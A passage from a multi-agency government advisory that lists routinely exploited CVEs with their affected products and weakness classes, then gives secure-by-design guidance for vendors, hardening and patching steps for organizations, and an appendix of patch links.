)\n\n(ProxyLogon)\n\n| \n\nMicrosoft\n\n| \n\nExchange Server\n\n| \n\nRCE\n\n| \n\n[CWE-918: Server-Side Request Forgery (SSRF)](<https://cwe.mitre.org/data/definitions/918.html> \"CWE-918: Server-Side Request Forgery \$SSRF\$\" ) \n \n[CVE-2021-27065](<https://nvd.nist.gov/vuln/detail/CVE-2021-27065> \"CVE-2021-27065\" )\n\n(ProxyLogon)\n\n| \n\nMicrosoft\n\n| \n\nExchange Server\n\n| \n\nRCE\n\n| \n\n[CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')](<https://cwe.mitre.org/data/definitions/22.html> \"CWE-22: Improper Limitation of a Pathname to a Restricted Directory \$'Path Traversal'\$\" ) \n \n[CVE-2021-26858](<https://nvd.nist.gov/vuln/detail/CVE-2021-26858> \"CVE-2021-26858\" )\n\n(ProxyLogon)\n\n| \n\nMicrosoft\n\n| \n\nExchange Server\n\n| \n\nRCE\n\n| \n\nNone Listed \n \n[CVE-2021-26857](<https://nvd.nist.gov/vuln/detail/CVE-2021-26857> \"CVE-2021-26857\" )\n\n(ProxyLogon)\n\n| \n\nMicrosoft\n\n| \n\nExchange Server\n\n| \n\nRCE\n\n| \n\n[CWE-502: Deserialization of Untrusted Data](<https://cwe.mitre.org/data/definitions/502.html> \"CWE-502: Deserialization of Untrusted Data\" ) \n \n[CVE-2021-20021](<https://nvd.nist.gov/vuln/detail/CVE-2021-20021> \"CVE-2021-20021\" )\n\n| \n\nSonicWALL\n\n| \n\nEmail Security\n\n| \n\nPrivilege Escalation Exploit Chain\n\n| \n\n[CWE-269: Improper Privilege Management](<https://cwe.mitre.org/data/definitions/269.html> \"CWE-269: Improper Privilege Management\" ) \n \n[CVE-2021-40438](<https://nvd.nist.gov/vuln/detail/CVE-2021-40438> \"CVE-2021-40438\" )\n\n| \n\nApache\n\n| \n\nHTTP Server\n\n| \n\nServer-Side Request Forgery\n\n| \n\n[CWE-918: Server-Side Request Forgery (SSRF)](<https://cwe.mitre.org/data/definitions/918.html> \"CWE-918: Server-Side Request Forgery \$SSRF\$\" ) \n \n[CVE-2021-41773](<https://nvd.nist.gov/vuln/detail/CVE-2021-41773> \"CVE-2021-41773\" )\n\n| \n\nApache\n\n| \n\nHTTP Server\n\n| \n\nServer Path Traversal\n\n| \n\n[CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')](<https://cwe.mitre.org/data/definitions/22.html> \"\u00a0CWE-22: Improper Limitation of a Pathname to a Restricted Directory \$'Path Traversal'\$\" ) \n \n[CVE-2021-42013](<https://nvd.nist.gov/vuln/detail/CVE-2021-42013> \"CVE-2021-42013\" )\n\n| \n\nApache\n\n| \n\nHTTP Server\n\n| \n\nServer Path Traversal\n\n| \n\n[CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')](<https://cwe.mitre.org/data/definitions/22.html> \"CWE-22: Improper Limitation of a Pathname to a Restricted Directory \$'Path Traversal'\$\" ) \n \n[CVE-2021-20038](<https://nvd.nist.gov/vuln/detail/CVE-2021-20038> \"CVE-2021-20038\" )\n\n| \n\nSonicWall\n\n| \n\nSMA 100 Series Appliances\n\n| \n\nStack-based Buffer Overflow\n\n| \n\n[CWE-787: Out-of-bounds Write](<https://cwe.mitre.org/data/definitions/787.html> \"CWE-787: Out-of-bounds Write\" )\n\n[CWE-121: Stack-based Buffer Overflow](<http://cwe.mitre.org/data/definitions/121.html> \"CWE-121: Stack-based Buffer Overflow\" ) \n \n[CVE-2021-45046](<https://nvd.nist.gov/vuln/detail/CVE-2021-45046> \"CVE-2021-45046\" )\n\n| \n\nApache\n\n| \n\nLog4j\n\n| \n\nRCE\n\n| \n\n[CWE-917: Improper Neutralization of Special Elements used in an Expression Language Statement ('Expression Language Injection')](<https://cwe.mitre.org/data/definitions/917.html> \"CWE-917: Improper Neutralization of Special Elements used in an Expression Language Statement \$'Expression Language Injection'\$\" ) \n \n[CVE-2022-42475](<https://nvd.nist.gov/vuln/detail/CVE-2022-42475> \"CVE-2022-42475\" )\n\n| \n\nFortinet\n\n| \n\nFortiOS\n\n| \n\nHeap-based Buffer Overflow\n\n| \n\n[CWE-787: Out-of-bounds Write](<https://cwe.mitre.org/data/definitions/787.html> \"CWE-787: Out-of-bounds Write\" ) \n \n[CVE-2022-24682](<https://nvd.nist.gov/vuln/detail/CVE-2022-24682> \"CVE-2022-24682\" )\n\n| \n\nZimbra\n\n| \n\nCollaboration Suite\n\n| \n\n\u2018Cross-site Scripting\u2019\n\n| \n\n[CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')](<https://cwe.mitre.org/data/definitions/79.html> \"CWE-79: Improper Neutralization of Input During Web Page Generation \$'Cross-site Scripting'\$\" ) \n \n[CVE-2022-22536](<https://nvd.nist.gov/vuln/detail/CVE-2022-22536> \"CVE-2022-22536\" )\n\n| \n\nSAP\n\n| \n\nInternet Communication Manager (ICM)\n\n| \n\nHTTP Request Smuggling\n\n| \n\n[CWE-444: Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')](<https://cwe.mitre.org/data/definitions/444.html> \"CWE-444: Inconsistent Interpretation of HTTP Requests \$'HTTP Request/Response Smuggling'\$\" ) \n \n[CVE-2022-22963](<https://nvd.nist.gov/vuln/detail/CVE-2022-22963> \"CVE-2022-22963\" )\n\n| \n\nVMware Tanzu\n\n| \n\nSpring Cloud\n\n| \n\nRCE\n\n| \n\n[CWE-94: Improper Control of Generation of Code ('Code Injection')](<https://cwe.mitre.org/data/definitions/94.html> \"CWE-94: Improper Control of Generation of Code \$'Code Injection'\$\" )\n\n[CWE-917: Improper Neutralization of Special Elements used in an Expression Language Statement ('Expression Language Injection')](<https://cwe.mitre.org/data/definitions/917.html> \"CWE-917: Improper Neutralization of Special Elements used in an Expression Language Statement \$'Expression Language Injection'\$\" ) \n \n[CVE-2022-29464](<https://nvd.nist.gov/vuln/detail/CVE-2022-29464> \"CVE-2022-29464\" )\n\n| \n\nWSO2\n\n| \n\nMultiple Products\n\n| \n\nRCE\n\n| \n\n[CWE-434: Unrestricted Upload of File with Dangerous Type](<https://cwe.mitre.org/data/definitions/434.html> \"CWE-434: Unrestricted Upload of File with Dangerous Type\" ) \n \n[CVE-2022-27924](<https://nvd.nist.gov/vuln/detail/CVE-2022-27924> \"CVE-2022-27924\" )\n\n| \n\nZimbra\n\n| \n\nZimbra Collaboration Suite\n\n| \n\nCommand Injection\n\n| \n\n[CWE-74: Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')](<https://cwe.mitre.org/data/definitions/74.html> \"CWE-74: Improper Neutralization of Special Elements in Output Used by a Downstream Component \$'Injection'\$\" ) \n \n[CVE-2022-22047](<https://nvd.nist.gov/vuln/detail/CVE-2022-22047> \"CVE-2022-22047\" )\n\n| \n\nMicrosoft\n\n| \n\nWindows CSRSS\n\n| \n\nElevation of Privilege\n\n| \n\n[CWE-269: Improper Privilege Management](<https://cwe.mitre.org/data/definitions/269.html> \"CWE-269: Improper Privilege Management\" ) \n \n[CVE-2022-27593](<https://nvd.nist.gov/vuln/detail/CVE-2022-27593> \"CVE-2022-27593\" )\n\n| \n\nQNAP\n\n| \n\nQNAP NAS\n\n| \n\nExternally Controlled Reference\n\n| \n\n[CWE-610: Externally Controlled Reference to a Resource in Another Sphere](<https://cwe.mitre.org/data/definitions/610.html> \"CWE-610: Externally Controlled Reference to a Resource in Another Sphere\" ) \n \n[CVE-2022-41082](<https://nvd.nist.gov/vuln/detail/CVE-2022-41082> \"CVE-2022-41082\" )\n\n| \n\nMicrosoft\n\n| \n\nExchange Server\n\n| \n\nPrivilege Escalation\n\n| \n\nNone Listed \n \n[CVE-2022-40684](<https://nvd.nist.gov/vuln/detail/CVE-2022-40684> \"CVE-2022-40684\" )\n\n| \n\nFortinet\n\n| \n\nFortiOS, FortiProxy, FortiSwitchManager\n\n| \n\nAuthentication Bypass\n\n| \n\n[CWE-306: Missing Authentication for Critical Function](<https://cwe.mitre.org/data/definitions/306.html> \"CWE-306: Missing Authentication for Critical Function\" ) \n \n### **MITIGATIONS**\n\n#### **Vendors and Developers**\n\nThe authoring agencies recommend vendors and developers take the following steps to ensure their products are secure by design and default:\n\n * **Identify repeatedly exploited classes of vulnerability. **Perform an analysis of both CVEs and known exploited vulnerabilities to understand which classes of vulnerability are identified more than others. Implement appropriate mitigations to eliminate those classes of vulnerability. For example, if a product has several instances of SQL injection vulnerabilities, ensure all database queries in the product use parameterized queries, and prohibit other forms of queries.\n * **Ensure business leaders are responsible for security. **Business leaders should ensure that proactive steps to eliminate entire classes of security vulnerabilities, rather than only making one-off patches when new vulnerabilities are discovered.\n * **Follow the SSDF** ([SP 800-218](<https://csrc.nist.gov/publications/detail/sp/800-218/final> \"NIST SP 800-218\" )_)_ and implement secure design practices into each stage of the SDLC. Pay attention to: \n * Prioritizing the use of memory safe languages wherever possible [[SSDF PW 6.1](<https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-218.pdf> \"NIST Special Publication 800-218\" )].\n * Exercising due diligence when selecting software components (e.g., software libraries, modules, middleware, frameworks) to ensure robust security in consumer software products [[SSDF PW 4.1](<https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-218.pdf> \"NIST Special Publication 800-218\" )].\n * Setting up secure development team practices; this includes conducting peer code reviews, working to a common organization secure coding standard, and maintaining awareness of language specific security concerns [[SSDF PW.5.1, PW.7.1, PW.7.2](<https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-218.pdf> \"NIST Special Publication 800-218\" )].\n * Establishing a [vulnerability disclosure program](<https://www.cyber.gov.au/resources-business-and-government/governance-and-user-education/governance/vulnerability-disclosure-programs-explained> \"Vulnerability Disclosure Programs Explained\" ) to verify and resolve security vulnerabilities disclosed by people who may be internal or external to the organization [[SSDF RV.1.3](<https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-218.pdf> \"NIST Special Publication 800-218\" )]. As part of this, establish processes to determine root causes of discovered vulnerabilities.\n * Using static and dynamic application security testing (SAST/DAST) tools to analyze product source code and application behavior to detect error-prone practices [[SSDF PW.7.2, PW.8.2](<https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-218.pdf> \"NIST Special Publication 800-218\" )].\n * Configuring production-ready products to have to most secure settings as default and providing guidance on the risks of changing each setting [[SSDF PW.9.1, PW9.2](<https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-218.pdf> \"NIST Special Publication 800-218\" )]\n * **Prioritize secure-by-default configurations** such as eliminating default passwords, implementing single sign on (SSO) technology via modern open standards, and providing high-quality audit logs to customers with no additional configuration and at no extra charge.\n * **Ensure published CVEs include the proper CWE field identifying the root cause of the vulnerability **to enable industry-wide analysis of software security and design flaws.\n\nFor more information on designing secure-by-design and -default products, including additional recommended secure-by-default configurations, see joint guide [Shifting the Balance of Cybersecurity Risk: Principles and Approaches for Security-by-Design and -Default](<https://www.cisa.gov/resources-tools/resources/secure-by-design-and-default> \"Security-by-Design and -Default\" ).\n\n#### **End-User Organizations**\n\nThe authoring agencies recommend end-user organizations implement the mitigations below to improve cybersecurity posture on the basis of the threat actors\u2019 activity. These mitigations align with the cross-sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA\u2019s [Cross-Sector Cybersecurity Performance Goals](<https://www.cisa.gov/cross-sector-cybersecurity-performance-goals> \"Cross-Sector Cybersecurity Performance Goals\" ) for more information on CPGs, including additional recommended baseline protections.\n\n#### **_Vulnerability and Configuration Management_**\n\n * **Update software, operating systems, applications, and firmware on IT network assets in a timely manner** [CPG 1.E]. Prioritize patching [known exploited vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog> \"Known Exploited Vulnerabilities Catalog\" ), especially those CVEs identified in this CSA, then critical and high vulnerabilities that allow for remote code execution or denial-of-service on internet-facing equipment. For patch information on CVEs identified in this CSA, refer to the appendix. \n * If a patch for a known exploited or critical vulnerability cannot be quickly applied, implement vendor-approved workarounds.\n * Replace end-of-life software (i.e., software no longer supported by the vendor).\n * **Routinely perform automated asset discovery** across the entire estate to identify and catalogue all the systems, services, hardware and software.\n * **Implement a robust patch management process **and centralized patch management system that establishes prioritization of patch applications [CPG 1.A]. \n * Organizations that are unable to perform rapid scanning and patching of internet-facing systems should consider moving these services to mature, reputable cloud service providers (CSPs) or other managed service providers (MSPs). Reputable MSPs can patch applications\u2014such as webmail, file storage, file sharing, and chat and other employee collaboration tools\u2014for their customers. However, MSPs and CSPs can expand their customer\u2019s attack surface and may introduce unanticipated risks, so organizations should proactively collaborate with their MSPs and CSPs to jointly reduce risk [CPG 1.F]. For more information and guidance, see the following resources. \n * CISA Insights Risk Considerations for Managed Service Provider Customers\n * CISA Insights Mitigations and Hardening Guidance for MSPs and Small- and Mid-sized Businesses\n * ACSC advice on [How to Manage Your Security When Engaging a Managed Service Provider](<https://www.cyber.gov.au/resources-business-and-government/maintaining-devices-and-systems/outsourcing-and-procurement/managed-services/how-manage-your-security-when-engaging-managed-service-provider> \"How to Manage Your Security When Engaging a Managed Service Provider\" )\n * **Document secure baseline configurations for all IT/OT components**, including cloud infrastructure. Monitor, examine, and document any deviations from the initial secure baseline [CPG 2.O].\n * **Perform regular secure system backups** and create known good copies of all device configurations for repairs and/or restoration. Store copies off-network in physically secure locations and test regularly [CPG 2.R].\n * **Maintain an updated cybersecurity incident response plan** that is tested at least annually and updated within a risk informed time frame to ensure its effectiveness [CPG 2.S].\n\n#### **_Identity and Access Management_**\n\n * **Enforce phishing-resistant multifactor authentication (MFA) for all users**, without exception. [CPG 2.H].\n * **Enforce MFA on all VPN connections**. If MFA is unavailable, require employees engaging in remote work to use strong passwords [CPG 2.A, 2.B, 2.C, 2.D, 2.G].\n * **Regularly review, validate, or remove privileged accounts** (annually at a minimum) [CPG 2.D, 2.E].\n * **Configure access control under the principle of least privilege** [CPG 2.Q]. \n * Ensure software service accounts only provide necessary permissions (least privilege) to perform intended functions (using non-administrative privileges where feasible). \n**Note:** See CISA\u2019s Capacity Enhancement Guide \u2013 Implementing Strong Authentication and ACSC\u2019s guidance on [Implementing Multi-Factor Authentication](<https://www.cyber.gov.au/resources-business-and-government/maintaining-devices-and-systems/system-hardening-and-administration/system-hardening/implementing-multi-factor-authentication> \"Implementing Multi-Factor Authentication\" ) for more information on authentication system hardening.\n\n#### **_Protective Controls and Architecture_**\n\n * **Properly configure and secure internet-facing network devices**, disable unused or unnecessary network ports and protocols, encrypt network traffic, and disable unused network services and devices [CPG 2.V, 2.W, 2X]. \n * Harden commonly exploited enterprise network services, including Link-Local Multicast Name Resolution (LLMNR) protocol, Remote Desktop Protocol (RDP), Common Internet File System (CIFS), Active Directory, and OpenLDAP.\n * Manage Windows Key Distribution Center (KDC) accounts (e.g., KRBTGT) to minimize Golden Ticket attacks and Kerberoasting.\n * Strictly control the use of native scripting applications, such as command-line, PowerShell, WinRM, Windows Management Instrumentation (WMI), and Distributed Component Object Model (DCOM).\n * **Implement Zero Trust Network Architecture (ZTNA)** to limit or block lateral movement by controlling access to applications, devices, and databases. Use private virtual local area networks [CPG 2.F, 2.X]. **Note:** See the Department of Defense\u2019s [Zero Trust Reference Architecture](<https://dodcio.defense.gov/Portals/0/Documents/Library/\$U\$ZT_RA_v2.0\$U\$_Sep22.pdf> \"Department of Defense \$DoD\$ Zero Trust Reference Architecture\" ) for additional information on Zero Trust.\n * **Continuously monitor the attack surface** and investigate abnormal activity that may indicate cyber actor or malware lateral movement [CPG 2.T]. \n * Use security tools, such as endpoint detection and response (EDR) and security information and event management (SIEM) tools. Consider using an information technology asset management (ITAM) solution to ensure EDR, SIEM, vulnerability scanner, and other similar tools are reporting the same number of assets [CPG 2.T, 2.V].\n * Use web application firewalls to monitor and filter web traffic. These tools are commercially available via hardware, software, and cloud-based solutions, and may detect and mitigate exploitation attempts where a cyber actor sends a malicious web request to an unpatched device [CPG 2.B, 2.F].\n * Implement an administrative policy and/or automated process configured to monitor unwanted hardware, software, or programs against an allowlist with specified approved versions [CPG 2.Q].\n * Use a network protocol analyzer to examine captured data, including packet-level data.\n\n#### **_Supply Chain Security_**\n\n * **Reduce third-party applications and unique system/application builds**\u2014provide exceptions only if required to support business critical functions [CPG 2.Q].\n * Ensure contracts require vendors and/or third-party service providers to: \n * Provide notification of security incidents and vulnerabilities within a risk informed time frame [CPG 1.G, 1.H, 1.I].\n * Supply a Software Bill of Materials (SBOM) with all products to enhance vulnerability monitoring and to help reduce time to respond to identified vulnerabilities [CPG 4.B].\n * **Ask your software providers to discuss their secure by design program** and to provide links to information about how they are working to remove classes of vulnerabilities, and to set secure default settings.\n\n### **RESOURCES**\n\n * For information on the top vulnerabilities routinely exploited in 2016 through 2019, 2020, and 2021, see: \n * Joint CSA [Top 10 Routinely Exploited Vulnerabilities](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-133a> \"Top 10 Routinely Exploited Vulnerabilities\" )\n * Joint CSA [Top Routinely Exploited Vulnerabilities](<https://www.cisa.gov/uscert/ncas/alerts/aa21-209a> \"Top Routinely Exploited Vulnerabilities\" )\n * Joint CSA [2021 Top Routinely Exploited Vulnerabilities](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-117a> \"2021 Top Routinely Exploited Vulnerabilities\" )\n * See the appendix for additional partner resources on the vulnerabilities mentioned in this CSA.\n * See ACSC\u2019s [Essential Eight mitigation strategies](<https://www.cyber.gov.au/resources-business-and-government/essential-cyber-security/essential-eight/essential-eight-maturity-model> \"Essential Eight Maturity Model\" ) for additional mitigations.\n * See ACSC\u2019s [Cyber Supply Chain Risk Management](<https://www.cyber.gov.au/resources-business-and-government/maintaining-devices-and-systems/outsourcing-and-procurement/cyber-supply-chains/cyber-supply-chain-risk-management> \"Cyber Supply Chain Risk Management\" ) for additional considerations and advice.\n\n### DISCLAIMER\n\nThe information in this report is being provided \u201cas is\u201d for informational purposes only. CISA, FBI, NSA, ACSC, CCCS, NCSC-NZ, CERT NZ, and NCSC-UK do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring.\n\n### **PURPOSE**\n\nThis document was developed by CISA, NSA, FBI, ACSC, CCCS, NCSC-NZ, CERT NZ, and NCSC-UK in furtherance of their respective cybersecurity missions, including their responsibilities to develop and issue cybersecurity specifications and mitigations.\n\n### **REFERENCES**\n\n[1] [Apache Log4j Vulnerability Guidance](<https://www.cisa.gov/news-events/news/apache-log4j-vulnerability-guidance> \"Apache Log4j Vulnerability Guidance\" )\n\n### **VERSION HISTORY**\n\nAugust 3, 2023: Initial version.\n\n### **APPENDIX: PATCH INFORMATION AND ADDITIONAL RESOURCES FOR TOP EXPLOITED VULNERABILITIES**\n\n**CVE**\n\n| \n\n**Vendor**\n\n| \n\n**Affected Products and Versions**\n\n| \n\n**Patch Information**\n\n| \n\n**Resources** \n \n---|---|---|---|--- \n \n[CVE-2017-0199](<https://nvd.nist.gov/vuln/detail/CVE-2017-0199> \"CVE-2017-0199\" )\n\n| \n\nMicrosoft\n\n| \n\nMultiple Products\n\n| \n\n[Microsoft Office/WordPad Remote Code Execution Vulnerability w/Windows](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0199> \"Microsoft Office/WordPad Remote Code Execution Vulnerability w/Windows\" )\n\n| \n \n[CVE-2017-11882](<https://nvd.nist.gov/vuln/detail/CVE-2017-11882> \"CVE-2017-11882\" )\n\n| \n\nMicrosoft\n\n| \n\nOffice, Multiple Versions\n\n| \n\n[Microsoft Office Memory Corruption Vulnerability, CVE-2017-11882](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-11882> \"Microsoft Office Memory Corruption Vulnerability\" )\n\n| \n \n[CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379> \"CVE-2018-13379\" )\n\n| \n\nFortinet\n\n| \n\nFortiOS and FortiProxy 2.0.2, 2.0.1, 2.0.0, 1.2.8, 1.2.7, 1.2.6, 1.2.5, 1.2.4, 1.2.3, 1.2.2, 1.2.1, 1.2.0, 1.1.6\n\n| \n\n[FortiProxy - system file leak through SSL VPN special crafted HTTP resource requests](<https://www.fortiguard.com/psirt/FG-IR-20-233> \"FortiProxy - system file leak through SSL VPN special crafted HTTP resource requests\" )\n\n| \n\nJoint CSAs:\n\n[Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-321a> \"Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities\" )\n\n[Russian State-Sponsored Cyber Actors Target Cleared Defense Contractor Networks to Obtain Sensitive U.S. Defense Information and Technology](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-047a> \"Russian State-Sponsored Cyber Actors Target Cleared Defense Contractor Networks to Obtain Sensitive U.S. Defense Information and Technology\" )\n\n[APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-283a> \"APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations\" ) \n \n[CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510> \"CVE-2019-11510\" )\n\n| \n\nIvanti\n\n| \n\nPulse Secure Pulse Connect Secure versions, 9.0R1 to 9.0R3.3, 8.3R1 to 8.3R7, and 8.2R1 to 8.2R12\n\n| \n\n[SA44101 - 2019-04: Out-of-Cycle Advisory: Multiple vulnerabilities resolved in Pulse Connect Secure / Pulse Policy Secure 9.0RX](<https://forums.ivanti.com/s/article/SA44101?language=en_US> \"SA44101 - 2019-04: Out-of-Cycle Advisory: Multiple vulnerabilities resolved in Pulse Connect Secure / Pulse Policy Secure 9.0RX\" )\n\n| \n\nCISA Alerts:\n\n[Continued Exploitation of Pulse Secure VPN Vulnerability](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-010a> \"Continued Exploitation of Pulse Secure VPN Vulnerability\" )\n\n[Chinese Ministry of State Security-Affiliated Cyber Threat Actor Activity](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-258a> \"Chinese Ministry of State Security-Affiliated Cyber Threat Actor Activity\" )\n\nACSC Advisory:\n\n[2019-129: Recommendations to mitigate vulnerability in Pulse Connect Secure VPN Software](<https://www.cyber.gov.au/about-us/advisories/2019-129-recommendations-mitigate-vulnerability-pulse-connect-secure-vpn-software> \"2019-129: Recommendations to mitigate vulnerability in Pulse Connect Secure VPN Software\" )\n\nJoint CSA:\n\n[APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-283a> \"APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations\" )\n\n_CCCS Alert:_\n\n[APT Actors Target U.S. and Allied Networks - Update 1](<https://www.cyber.gc.ca/en/alerts/apt-actors-target-us-and-allied-networks-nsacisafbi> \"Alert - APT Actors Target U.S. and Allied Networks - update 1\" ) \n \n[CVE-2019-0708](<https://nvd.nist.gov/vuln/detail/CVE-2019-0708> \"CVE-2019-0708\" )\n\n| \n\nMicrosoft\n\n| \n\nRemote Desktop Services\n\n| \n\n[Remote Desktop Services Remote Code Execution Vulnerability](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2019-0708> \"Remote Desktop Services Remote Code Execution Vulnerability\" )\n\n| \n \n[CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781> \"CVE-2019-19781\" )\n\n| \n\nCitrix\n\n| \n\nADC and Gateway version 13.0 all supported builds before 13.0.47.24\n\nNetScaler ADC and NetScaler Gateway, version 12.1 all supported builds before 12.1.55.18; version 12.0 all supported builds before 12.0.63.13; version 11.1 all supported builds before 11.1.63.15; version 10.5 all supported builds before 10.5.70.12\n\nSD-WAN WANOP appliance models 4000-WO, 4100-WO, 5000-WO, and 5100-WO all supported software release builds before 10.2.6b and 11.0.3b\n\n| \n\n[CVE-2019-19781 - Vulnerability in Citrix Application Delivery Controller, Citrix Gateway, and Citrix SD-WAN WANOP appliance](<https://support.citrix.com/article/CTX267027/cve201919781-vulnerability-in-citrix-application-delivery-controller-citrix-gateway-and-citrix-sdwan-wanop-appliance> \"CVE-2019-19781 - Vulnerability in Citrix Application Delivery Controller, Citrix Gateway, and Citrix SD-WAN WANOP appliance\" )\n\n| \n\nJoint CSAs:\n\n[APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-283a> \"APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations\" )\n\n[Chinese Ministry of State Security-Affiliated Cyber Threat Actor Activity](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-258a> \"Chinese Ministry of State Security-Affiliated Cyber Threat Actor Activity\" )\n\n_CCCS Alert:_\n\n[Detecting Compromises relating to Citrix CVE-2019-19781](<https://www.cyber.gc.ca/en/alerts/detecting-compromises-relating-citrix-cve-2019-19781-0> \"Alert - Detecting Compromises relating to Citrix CVE-2019-19781\" ) \n \n[CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902> \"CVE-2020-5902\" )\n\n| \n\nF5\n\n| \n\nBIG IP versions 15.1.0, 15.0.0 to 15.0.1, 14.1.0 to 14.1.2, 13.1.0 to 13.1.3, 12.1.0 to 12.1.5, and 11.6.1 to 11.6.5\n\n| \n\n[K52145254: TMUI RCE vulnerability CVE-2020-5902](<https://my.f5.com/manage/s/article/K52145254> \"K52145254: TMUI RCE vulnerability CVE-2020-5902\" )\n\n| \n\nCISA Alert:\n\n[Threat Actor Exploitation of F5 BIG-IP CVE-2020-5902](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-206a> \"Threat Actor Exploitation of F5 BIG-IP CVE-2020-5902\" ) \n \n[CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472> \"CVE-2020-1472\" )\n\n| \n\nMicrosoft\n\n| \n\nWindows Server, Multiple Versions\n\n| \n\n[Microsoft Security Update Guide: Netlogon Elevation of Privilege Vulnerability, CVE-2020-1472](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1472> \"Netlogon Elevation of Privilege Vulnerability\" )\n\n| \n\nACSC Advisory:\n\n[2020-016: Netlogon Elevation of Privilege Vulnerability (CVE-2020-1472)](<https://www.cyber.gov.au/about-us/advisories/advisory-2020-016-zerologon-netlogon-elevation-privilege-vulnerability-cve-2020-1472> \"Advisory 2020-016: \"Zerologon\" - Netlogon Elevation of Privilege Vulnerability \$CVE-2020-1472\$\" )\n\nJoint CSA:\n\n[APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-283a> \"APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations\" )\n\n_CCCS Alert:_\n\n[Microsoft Netlogon Elevation of Privilege Vulnerability - CVE-2020-1472 - Update 1](<https://www.cyber.gc.ca/en/alerts/microsoft-netlogon-elevation-privilege-vulnerability-cve-2020-1472> \"Alert - Microsoft Netlogon Elevation of Privilege Vulnerability - CVE-2020-1472 - update 1\" ) \n \n[CVE-2020-14882](<https://nvd.nist.gov/vuln/detail/CVE-2020-14882> \"CVE-2020-14882\" )\n\n| \n\nOracle\n\n| \n\nWebLogic Server, versions 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0\n\n| \n\n[Oracle Critical Patch Update Advisory - October 2020](<https://www.oracle.com/security-alerts/cpuoct2020traditional.html> \"Oracle Critical Patch Update Advisory - October 2020\" )\n\n| \n \n[CVE-2020-14883](<https://nvd.nist.gov/vuln/detail/CVE-2020-14883> \"CVE-2020-14883\" )\n\n| \n\nOracle\n\n| \n\nWebLogic Server, versions 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0\n\n| \n\n[Oracle Critical Patch Update Advisory - October 2020](<https://www.oracle.com/security-alerts/cpuoct2020traditional.html> \"Oracle Critical Patch Update Advisory - October 2020\" )\n\n| \n \n[CVE-2021-20016](<https://nvd.nist.gov/vuln/detail/CVE-2021-20016> \"CVE-2021-20016\" )\n\n| \n\nSonicWALL\n\n| \n\nSSLVPN SMA100, Build Version 10.x\n\n| \n\n[Confirmed Zero-day vulnerability in the SonicWall SMA100 build version 10.x](<https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0001> \"CONFIRMED ZERO-DAY VULNERABILITY IN THE SONICWALL SMA100 BUILD VERSION 10.X\" )\n\n| \n \n[CVE-2021-26855](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855> \"CVE-2021-26855\" )\n\n| \n\nMicrosoft\n\n| \n\nExchange Server, Multiple Versions\n\n| \n\n[Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-26855](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26855> \"Microsoft Exchange Server Remote Code Execution Vulnerability\" )\n\n| \n\nCISA Alert:\n\n[Mitigate Microsoft Exchange Server Vulnerabilities](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-062a> 